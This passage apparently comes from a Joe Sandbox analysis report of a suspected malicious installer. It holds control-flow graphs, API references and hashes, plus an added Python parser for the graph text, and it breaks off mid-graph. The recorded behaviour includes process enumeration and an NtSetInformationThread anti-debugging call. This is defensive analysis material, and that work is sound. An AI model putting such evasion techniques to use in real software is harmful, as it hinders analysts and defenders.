                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CC5524E
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: 54456ef312bf471d70e57afd9238963c6c7ea72a82e48c5f30afc27ae85fd2d5
                              • Instruction ID: 93620b00fb95452a9160569b0bd1c67403813fb25199002ac11a949fadb81101
                              • Opcode Fuzzy Hash: 54456ef312bf471d70e57afd9238963c6c7ea72a82e48c5f30afc27ae85fd2d5
                              • Instruction Fuzzy Hash: 17314D78608300AFD7109F29CC88B0ABBF4FF95754F91492DE598C7360E3B1A8688B57
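                              The control_flow_graph line above is the report's graph for 6cc55240 flattened into one token stream: node ids, basic-block address ranges, the API each block calls, call targets inside the module, and a->b edges. Turning that back into a structure is the first thing an analyst reading this dump wants, so a small parser for it follows. It is an added example, not code from the Joe Sandbox report or its IDA plugin, and its sample input is the 6cc55240 graph copied from the entry above. Its format assumptions are that a node id is an all-digit token immediately followed by an address, that an address is 8 hex digits (optionally a start-end range) containing at least one letter, and that the words API, calls and library are annotation noise from execution-graph entries such as "18 API calls" rather than exports. On the sample it recovers the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW enumeration loop and the path from the entry block to the Process32NextW block.

```python
"""Parse a Joe Sandbox control-flow / execution graph token stream (added example, not report code)."""
import re
from collections import deque

# Format assumptions (see lead-in): a block address is 8 hex digits, optionally "start-end",
# and in this report always contains a letter; node ids are plain decimal integers.
ADDR_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{8})?")
EDGE_RE = re.compile(r"(\d+)->(\d+)")
# Exported API names as the report prints them (GetCurrentThread, NtSetInformationThread, ...);
# CRT/STL internals such as __wsopen_s or std::_Lockit::_Lockit deliberately do not match.
API_RE = re.compile(r"(?:Nt|Zw)?[A-Z][A-Za-z0-9]+")
NOISE = {"API", "calls", "library"}  # words from "18 API calls" / "4 library calls" annotations

# Sample input: the 6cc55240 control-flow graph copied from the report entry above.
SAMPLE = """control_flow_graph 7677 6cc55240-6cc55275 CreateToolhelp32Snapshot 7678 6cc552a0-6cc552a9
7677->7678 7679 6cc552e0-6cc552e5 7678->7679 7680 6cc552ab-6cc552b0 7678->7680
7683 6cc55377-6cc553a1 call 6cc62c05 7679->7683 7684 6cc552eb-6cc552f0 7679->7684
7681 6cc55315-6cc5531a 7680->7681 7682 6cc552b2-6cc552b7 7680->7682 7689 6cc553a6-6cc553ab 7681->7689
7690 6cc55320-6cc55332 Process32NextW 7681->7690 7685 6cc55334-6cc5535d call 6cc5b920 Process32FirstW 7682->7685
7686 6cc552b9-6cc552be 7682->7686 7683->7678 7687 6cc55277-6cc55292 CloseHandle 7684->7687
7688 6cc552f2-6cc552f7 7684->7688 7695 6cc55362-6cc55372 7685->7695 7686->7678 7693 6cc552c0-6cc552d1 7686->7693
7687->7678 7688->7678 7694 6cc552f9-6cc55313 7688->7694 7689->7678 7692 6cc553b1-6cc553bf 7689->7692
7690->7695 7693->7678 7694->7678 7695->7678"""


def _is_addr(tok):
    return bool(ADDR_RE.fullmatch(tok)) and not tok.isdigit()


def _new_node():
    return {"range": None, "labels": [], "calls": []}


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> {range, labels, calls}; edges is a list of (src, dst)."""
    toks = text.split()
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        tok = toks[i]
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        m = EDGE_RE.fullmatch(tok)
        if m:
            src, dst = int(m.group(1)), int(m.group(2))
            nodes.setdefault(src, _new_node())
            nodes.setdefault(dst, _new_node())  # the target may be defined outside the copied span
            edges.append((src, dst))
            i += 1
        elif tok.isdigit() and _is_addr(nxt):  # "7677 6cc55240-6cc55275" starts a block
            cur = nodes.setdefault(int(tok), _new_node())
            cur["range"] = nxt
            i += 2
        elif cur is not None and tok == "call" and _is_addr(nxt):  # "call 6cc62c05": intra-module callee
            cur["calls"].append(nxt)
            i += 2
        else:
            if cur is not None and not tok.isdigit() and not _is_addr(tok) and tok not in NOISE:
                cur["labels"].append(tok)  # API name or CRT/STL symbol attached to the block
            i += 1
    return nodes, edges


def api_sites(nodes):
    """Map each API-looking label to the (node id, block range) pairs that reference it."""
    sites = {}
    for nid in sorted(nodes):
        for lab in dict.fromkeys(nodes[nid]["labels"]):  # de-duplicate "WriteFile WriteFile ..."
            if API_RE.fullmatch(lab):
                sites.setdefault(lab, []).append((nid, nodes[nid]["range"]))
    return sites


def path_to(edges, src, dst):
    """Shortest src->dst path over the edge list (BFS), or None if dst is unreachable."""
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    prev, queue = {src: None}, deque([src])
    while queue:
        n = queue.popleft()
        if n == dst:
            path = []
            while n is not None:
                path.append(n)
                n = prev[n]
            return path[::-1]
        for m in succ.get(n, ()):
            if m not in prev:
                prev[m] = n
                queue.append(m)
    return None


if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE)
    for api, where in api_sites(nodes).items():
        print(f"{api:28s} {', '.join(r for _, r in where)}")
    print("entry -> Process32NextW:", path_to(edges, 7677, 7690))
```

                              Fed the execution-graph lines earlier in this section (the 1006xx-numbered nodes), the same parser lists every block that references NtSetInformationThread, OpenSCManagerA or NtInitiatePowerAction; edges to nodes defined outside the copied span are kept as nodes without an address range, so path queries still work across the fragment.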

                              Control-flow Graph

                              control_flow_graph 7821 6cad3886-6cad388e 7822 6cad3894-6cad3896 7821->7822 7823 6cad3970-6cad397d 7821->7823 7822->7823 7824 6cad389c-6cad38b9 7822->7824 7825 6cad397f-6cad3989 7823->7825 7826 6cad39f1-6cad39f8 7823->7826 7829 6cad38c0-6cad38c1 7824->7829 7825->7824 7830 6cad398f-6cad3994 7825->7830 7827 6cad39fe-6cad3a03 7826->7827 7828 6cad3ab5-6cad3aba 7826->7828 7831 6cad3a09-6cad3a2f 7827->7831 7832 6cad38d2-6cad38d4 7827->7832 7828->7824 7834 6cad3ac0-6cad3ac7 7828->7834 7833 6cad395e 7829->7833 7835 6cad399a-6cad399f 7830->7835 7836 6cad3b16-6cad3b18 7830->7836 7839 6cad38f8-6cad3955 7831->7839 7840 6cad3a35-6cad3a3a 7831->7840 7841 6cad3957-6cad395c 7832->7841 7842 6cad3960-6cad3964 7833->7842 7834->7829 7843 6cad3acd-6cad3ad6 7834->7843 7837 6cad383b-6cad3855 call 6cc21470 call 6cc21480 7835->7837 7838 6cad39a5-6cad39bf 7835->7838 7836->7829 7849 6cad3860-6cad3885 7837->7849 7844 6cad3a5a-6cad3a5d 7838->7844 7839->7841 7845 6cad3b1d-6cad3b22 7840->7845 7846 6cad3a40-6cad3a57 7840->7846 7841->7833 7848 6cad396a 7842->7848 7842->7849 7843->7836 7850 6cad3ad8-6cad3aeb 7843->7850 7853 6cad3aa9-6cad3ab0 7844->7853 7851 6cad3b49-6cad3b50 7845->7851 7852 6cad3b24-6cad3b44 7845->7852 7846->7844 7855 6cad3ba1-6cad3bb6 7848->7855 7849->7821 7850->7839 7856 6cad3af1-6cad3af8 7850->7856 7851->7829 7860 6cad3b56-6cad3b5d 7851->7860 7852->7853 7853->7842 7861 6cad3bc0-6cad3bda call 6cc21470 call 6cc21480 7855->7861 7863 6cad3afa-6cad3aff 7856->7863 7864 6cad3b62-6cad3b85 7856->7864 7860->7842 7872 6cad3be0-6cad3bfe 7861->7872 7863->7841 7864->7839 7866 6cad3b8b 7864->7866 7866->7855 7875 6cad3e7b 7872->7875 7876 6cad3c04-6cad3c11 7872->7876 7879 6cad3e81-6cad3ee0 call 6cad3750 GetCurrentThread NtSetInformationThread 7875->7879 7877 6cad3c17-6cad3c20 7876->7877 7878 6cad3ce0-6cad3cea 7876->7878 7880 6cad3dc5 7877->7880 7881 6cad3c26-6cad3c2d 7877->7881 7882 6cad3cec-6cad3d0c 7878->7882 7883 6cad3d3a-6cad3d3c 7878->7883 7898 
6cad3eea-6cad3f04 call 6cc21470 call 6cc21480 7879->7898 7887 6cad3dc6 7880->7887 7885 6cad3dc3 7881->7885 7886 6cad3c33-6cad3c3a 7881->7886 7888 6cad3d90-6cad3d95 7882->7888 7889 6cad3d3e-6cad3d45 7883->7889 7890 6cad3d70-6cad3d8d 7883->7890 7885->7880 7892 6cad3e26-6cad3e2b 7886->7892 7893 6cad3c40-6cad3c5b 7886->7893 7894 6cad3dc8-6cad3dcc 7887->7894 7896 6cad3dba-6cad3dc1 7888->7896 7897 6cad3d97-6cad3db8 7888->7897 7895 6cad3d50-6cad3d57 7889->7895 7890->7888 7899 6cad3c7b-6cad3cd0 7892->7899 7900 6cad3e31 7892->7900 7901 6cad3e1b-6cad3e24 7893->7901 7894->7872 7902 6cad3dd2 7894->7902 7895->7887 7896->7885 7904 6cad3dd7-6cad3ddc 7896->7904 7897->7880 7915 6cad3f75-6cad3fa1 7898->7915 7899->7895 7900->7861 7901->7894 7907 6cad3e76-6cad3e79 7901->7907 7902->7907 7905 6cad3dde-6cad3e17 7904->7905 7906 6cad3e36-6cad3e3d 7904->7906 7905->7901 7911 6cad3e5c-6cad3e5f 7906->7911 7912 6cad3e3f-6cad3e5a 7906->7912 7907->7879 7911->7899 7914 6cad3e65-6cad3e69 7911->7914 7912->7901 7914->7894 7914->7907 7919 6cad4020-6cad4026 7915->7919 7920 6cad3fa3-6cad3fa8 7915->7920 7923 6cad402c-6cad403c 7919->7923 7924 6cad3f06-6cad3f35 7919->7924 7921 6cad407c-6cad4081 7920->7921 7922 6cad3fae-6cad3fcf 7920->7922 7927 6cad40aa-6cad40ae 7921->7927 7928 6cad4083-6cad408a 7921->7928 7922->7927 7925 6cad403e-6cad4058 7923->7925 7926 6cad40b3-6cad40b8 7923->7926 7929 6cad3f38-6cad3f61 7924->7929 7930 6cad405a-6cad4063 7925->7930 7926->7922 7932 6cad40be-6cad40c9 7926->7932 7933 6cad3f6b-6cad3f6f 7927->7933 7928->7929 7931 6cad4090 7928->7931 7934 6cad3f64-6cad3f67 7929->7934 7935 6cad4069-6cad406c 7930->7935 7936 6cad40f5-6cad413f 7930->7936 7931->7898 7937 6cad40a7 7931->7937 7932->7927 7938 6cad40cb-6cad40d4 7932->7938 7933->7915 7939 6cad3f69 7934->7939 7940 6cad4144-6cad414b 7935->7940 7941 6cad4072-6cad4077 7935->7941 7936->7939 7937->7927 7938->7937 7942 6cad40d6-6cad40f0 7938->7942 7939->7933 7940->7933 7941->7934 7942->7930
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3edede1f9e17652031a0a9776104b19d93e1d9e9e21915b503ca39efd2dbdaaa
                              • Instruction ID: 39e047a25c8babb2caa7b95a91098332f79d0687d1d9908a4200002c4acd1a64
                              • Opcode Fuzzy Hash: 3edede1f9e17652031a0a9776104b19d93e1d9e9e21915b503ca39efd2dbdaaa
                              • Instruction Fuzzy Hash: 3532B232246B018FC324CF28C890695B7F3EFD531476E8A6DC0EA5BA95D775B48ACB50

                              Control-flow Graph

                              control_flow_graph 7969 6cad3a6a-6cad3a85 7970 6cad3a87-6cad3aa7 7969->7970 7971 6cad3aa9-6cad3ab0 7970->7971 7972 6cad3960-6cad3964 7971->7972 7973 6cad396a 7972->7973 7974 6cad3860-6cad388e 7972->7974 7975 6cad3ba1-6cad3bb6 7973->7975 7983 6cad3894-6cad3896 7974->7983 7984 6cad3970-6cad397d 7974->7984 7978 6cad3bc0-6cad3bda call 6cc21470 call 6cc21480 7975->7978 7993 6cad3be0-6cad3bfe 7978->7993 7983->7984 7986 6cad389c-6cad38b9 7983->7986 7988 6cad397f-6cad3989 7984->7988 7989 6cad39f1-6cad39f8 7984->7989 7992 6cad38c0-6cad38c1 7986->7992 7988->7986 7994 6cad398f-6cad3994 7988->7994 7990 6cad39fe-6cad3a03 7989->7990 7991 6cad3ab5-6cad3aba 7989->7991 7995 6cad3a09-6cad3a2f 7990->7995 7996 6cad38d2-6cad38d4 7990->7996 7991->7986 7998 6cad3ac0-6cad3ac7 7991->7998 7997 6cad395e 7992->7997 8009 6cad3e7b 7993->8009 8010 6cad3c04-6cad3c11 7993->8010 8000 6cad399a-6cad399f 7994->8000 8001 6cad3b16-6cad3b18 7994->8001 8004 6cad38f8-6cad3955 7995->8004 8005 6cad3a35-6cad3a3a 7995->8005 8006 6cad3957-6cad395c 7996->8006 7997->7972 7998->7992 8007 6cad3acd-6cad3ad6 7998->8007 8002 6cad383b-6cad3855 call 6cc21470 call 6cc21480 8000->8002 8003 6cad39a5-6cad39bf 8000->8003 8001->7992 8002->7974 8011 6cad3a5a-6cad3a5d 8003->8011 8004->8006 8012 6cad3b1d-6cad3b22 8005->8012 8013 6cad3a40-6cad3a57 8005->8013 8006->7997 8007->8001 8015 6cad3ad8-6cad3aeb 8007->8015 8020 6cad3e81-6cad3ee0 call 6cad3750 GetCurrentThread NtSetInformationThread 8009->8020 8016 6cad3c17-6cad3c20 8010->8016 8017 6cad3ce0-6cad3cea 8010->8017 8011->7971 8018 6cad3b49-6cad3b50 8012->8018 8019 6cad3b24-6cad3b44 8012->8019 8013->8011 8015->8004 8022 6cad3af1-6cad3af8 8015->8022 8023 6cad3dc5 8016->8023 8024 6cad3c26-6cad3c2d 8016->8024 8026 6cad3cec-6cad3d0c 8017->8026 8027 6cad3d3a-6cad3d3c 8017->8027 8018->7992 8025 6cad3b56-6cad3b5d 8018->8025 8019->7970 8047 6cad3eea-6cad3f04 call 6cc21470 call 6cc21480 8020->8047 8030 6cad3afa-6cad3aff 8022->8030 8031 6cad3b62-6cad3b85 
8022->8031 8035 6cad3dc6 8023->8035 8032 6cad3dc3 8024->8032 8033 6cad3c33-6cad3c3a 8024->8033 8025->7972 8036 6cad3d90-6cad3d95 8026->8036 8037 6cad3d3e-6cad3d45 8027->8037 8038 6cad3d70-6cad3d8d 8027->8038 8030->8006 8031->8004 8034 6cad3b8b 8031->8034 8032->8023 8041 6cad3e26-6cad3e2b 8033->8041 8042 6cad3c40-6cad3c5b 8033->8042 8034->7975 8043 6cad3dc8-6cad3dcc 8035->8043 8045 6cad3dba-6cad3dc1 8036->8045 8046 6cad3d97-6cad3db8 8036->8046 8044 6cad3d50-6cad3d57 8037->8044 8038->8036 8048 6cad3c7b-6cad3cd0 8041->8048 8049 6cad3e31 8041->8049 8050 6cad3e1b-6cad3e24 8042->8050 8043->7993 8051 6cad3dd2 8043->8051 8044->8035 8045->8032 8053 6cad3dd7-6cad3ddc 8045->8053 8046->8023 8064 6cad3f75-6cad3fa1 8047->8064 8048->8044 8049->7978 8050->8043 8056 6cad3e76-6cad3e79 8050->8056 8051->8056 8054 6cad3dde-6cad3e17 8053->8054 8055 6cad3e36-6cad3e3d 8053->8055 8054->8050 8060 6cad3e5c-6cad3e5f 8055->8060 8061 6cad3e3f-6cad3e5a 8055->8061 8056->8020 8060->8048 8063 6cad3e65-6cad3e69 8060->8063 8061->8050 8063->8043 8063->8056 8068 6cad4020-6cad4026 8064->8068 8069 6cad3fa3-6cad3fa8 8064->8069 8072 6cad402c-6cad403c 8068->8072 8073 6cad3f06-6cad3f35 8068->8073 8070 6cad407c-6cad4081 8069->8070 8071 6cad3fae-6cad3fcf 8069->8071 8076 6cad40aa-6cad40ae 8070->8076 8077 6cad4083-6cad408a 8070->8077 8071->8076 8074 6cad403e-6cad4058 8072->8074 8075 6cad40b3-6cad40b8 8072->8075 8078 6cad3f38-6cad3f61 8073->8078 8079 6cad405a-6cad4063 8074->8079 8075->8071 8081 6cad40be-6cad40c9 8075->8081 8082 6cad3f6b-6cad3f6f 8076->8082 8077->8078 8080 6cad4090 8077->8080 8083 6cad3f64-6cad3f67 8078->8083 8084 6cad4069-6cad406c 8079->8084 8085 6cad40f5-6cad413f 8079->8085 8080->8047 8086 6cad40a7 8080->8086 8081->8076 8087 6cad40cb-6cad40d4 8081->8087 8082->8064 8088 6cad3f69 8083->8088 8089 6cad4144-6cad414b 8084->8089 8090 6cad4072-6cad4077 8084->8090 8085->8088 8086->8076 8087->8086 8091 6cad40d6-6cad40f0 8087->8091 8088->8082 8089->8082 8090->8083 8091->8079
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: e6ee8ce25816146f657a4c9cd42960045a550f46aa7acb9168a371461b05d8a3
                              • Instruction ID: 904e1d14ffbac96631b3635f80b97d35d4257bb6712408b24b0ae2c8c9f65c52
                              • Opcode Fuzzy Hash: e6ee8ce25816146f657a4c9cd42960045a550f46aa7acb9168a371461b05d8a3
                              • Instruction Fuzzy Hash: E251F1312067018FC320CF29C880795B7F3BF96314F6A8A1DC0EA1BA95DB75B48A8B41
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 3df567c2f41b5bc736ea78bfea0d32740a303d9ba212f1b279d20c85e8c05388
                              • Instruction ID: a0110e8cb4ce533a27e8e5ff8b8ebd0ecc10cbc404c4991d475e33995feb06d2
                              • Opcode Fuzzy Hash: 3df567c2f41b5bc736ea78bfea0d32740a303d9ba212f1b279d20c85e8c05388
                              • Instruction Fuzzy Hash: B551B171106B018FC320CF29C480795B7F3BF96314F6A8B5DC0E65BA95DB75B48A8B91
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 3b75eef3b94b341b60d8681545772f7e66123549641423d7f6e918c26af51b3e
                              • Instruction ID: 784c0950dd5aff4f5050fef9b2b44ff865f6615f436b5e5ff7198ae5d959b195
                              • Opcode Fuzzy Hash: 3b75eef3b94b341b60d8681545772f7e66123549641423d7f6e918c26af51b3e
                              • Instruction Fuzzy Hash: 0131F431246B018FD320CF28C8847C6B7B3BF96314F6A4E1DC0E65BA95DB7974899B51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: ae735c6a44565f6ace8d09982c62ad697aa8eb1ab4f62100fd098e94996edb2e
                              • Instruction ID: c637544a3079c8e3785592db6f36986e6af9aefb4f1c66172b2307674b55c9a2
                              • Opcode Fuzzy Hash: ae735c6a44565f6ace8d09982c62ad697aa8eb1ab4f62100fd098e94996edb2e
                              • Instruction Fuzzy Hash: 4A31D131105B018BD724CF28C490796B7B6BF96304F6A4E1DC0EA5BA85DB757489CB52
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: ab166a787cd6905407f83dcabf994d0815043315b7e4bf4c157715366df8c111
                              • Instruction ID: d5559aa2033020262841fb1cd4a4f5081011143d227c8de3dc873339ad711a8d
                              • Opcode Fuzzy Hash: ab166a787cd6905407f83dcabf994d0815043315b7e4bf4c157715366df8c111
                              • Instruction Fuzzy Hash: C72106702197028BD324CF28C89079677B6BF46304F5A4E1DD0E69BAD4DB75B4898B52
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC55130
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: b22c26cd67168d736a8e6ac87823bd5900f895f4e680ce2b64f1b54165d0dd2d
                              • Instruction ID: 308a43dc430a5e52b453cbf742fcde67d9bfdf241443d871339a8aad86eb2617
                              • Opcode Fuzzy Hash: b22c26cd67168d736a8e6ac87823bd5900f895f4e680ce2b64f1b54165d0dd2d
                              • Instruction Fuzzy Hash: D03145B4608301EFC7108F29C584B4BBFF0BB89764F90895AF988C6360D331D8689B67
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6CC4AEDC
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 2fb598d5b363230da044b7ff4b26072ec0b73a1df12faaa9e3b7f14c1d546db0
                              • Instruction ID: 982a7148b7169c0573e7d8bebb8b243c9860660beb2c3e546c639f3114bfe660
                              • Opcode Fuzzy Hash: 2fb598d5b363230da044b7ff4b26072ec0b73a1df12faaa9e3b7f14c1d546db0
                              • Instruction Fuzzy Hash: 111136B4508351AFE7108F29D54491EBBE4BFC6314F14CE69F4A8CB691E330CC858B22
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CC2ABA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: 540fff6ec76e3ce6fc592a90936f2a935c6a69bfe1becb13eeb4e1d11b32c03c
                              • Instruction ID: 5f5d3232215e7873e3024ebdd922f8c45fa8327fe64bc1769490f90ab70ac6a3
                              • Opcode Fuzzy Hash: 540fff6ec76e3ce6fc592a90936f2a935c6a69bfe1becb13eeb4e1d11b32c03c
                              • Instruction Fuzzy Hash: 5762487060D3818FC724CF29C490A5ABBE2ABD9314F248D5EE99ACB751E739D845CB43

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6824 6cc6cad3-6cc6cae3 6825 6cc6cae5-6cc6caf8 call 6cc5f9df call 6cc5f9cc 6824->6825 6826 6cc6cafd-6cc6caff 6824->6826 6843 6cc6ce7c 6825->6843 6828 6cc6ce64-6cc6ce71 call 6cc5f9df call 6cc5f9cc 6826->6828 6829 6cc6cb05-6cc6cb0b 6826->6829 6848 6cc6ce77 call 6cc60120 6828->6848 6829->6828 6832 6cc6cb11-6cc6cb37 6829->6832 6832->6828 6835 6cc6cb3d-6cc6cb46 6832->6835 6838 6cc6cb60-6cc6cb62 6835->6838 6839 6cc6cb48-6cc6cb5b call 6cc5f9df call 6cc5f9cc 6835->6839 6841 6cc6ce60-6cc6ce62 6838->6841 6842 6cc6cb68-6cc6cb6b 6838->6842 6839->6848 6846 6cc6ce7f-6cc6ce82 6841->6846 6842->6841 6847 6cc6cb71-6cc6cb75 6842->6847 6843->6846 6847->6839 6850 6cc6cb77-6cc6cb8e 6847->6850 6848->6843 6853 6cc6cb90-6cc6cb93 6850->6853 6854 6cc6cbdf-6cc6cbe5 6850->6854 6857 6cc6cb95-6cc6cb9e 6853->6857 6858 6cc6cba3-6cc6cba9 6853->6858 6855 6cc6cbe7-6cc6cbf1 6854->6855 6856 6cc6cbab-6cc6cbc2 call 6cc5f9df call 6cc5f9cc call 6cc60120 6854->6856 6859 6cc6cbf3-6cc6cbf5 6855->6859 6860 6cc6cbf8-6cc6cc16 call 6cc647f5 call 6cc647bb * 2 6855->6860 6888 6cc6cd97 6856->6888 6861 6cc6cc63-6cc6cc73 6857->6861 6858->6856 6862 6cc6cbc7-6cc6cbda 6858->6862 6859->6860 6898 6cc6cc33-6cc6cc5c call 6cc6ac69 6860->6898 6899 6cc6cc18-6cc6cc2e call 6cc5f9cc call 6cc5f9df 6860->6899 6864 6cc6cd38-6cc6cd41 call 6cc719e5 6861->6864 6865 6cc6cc79-6cc6cc85 6861->6865 6862->6861 6877 6cc6cdb4 6864->6877 6878 6cc6cd43-6cc6cd55 6864->6878 6865->6864 6869 6cc6cc8b-6cc6cc8d 6865->6869 6869->6864 6873 6cc6cc93-6cc6ccb7 6869->6873 6873->6864 6879 6cc6ccb9-6cc6cccf 6873->6879 6881 6cc6cdb8-6cc6cdd0 ReadFile 6877->6881 6878->6877 6883 6cc6cd57-6cc6cd66 GetConsoleMode 6878->6883 6879->6864 6884 6cc6ccd1-6cc6ccd3 6879->6884 6886 6cc6cdd2-6cc6cdd8 6881->6886 6887 6cc6ce2c-6cc6ce37 GetLastError 6881->6887 6883->6877 6889 6cc6cd68-6cc6cd6c 6883->6889 6884->6864 6890 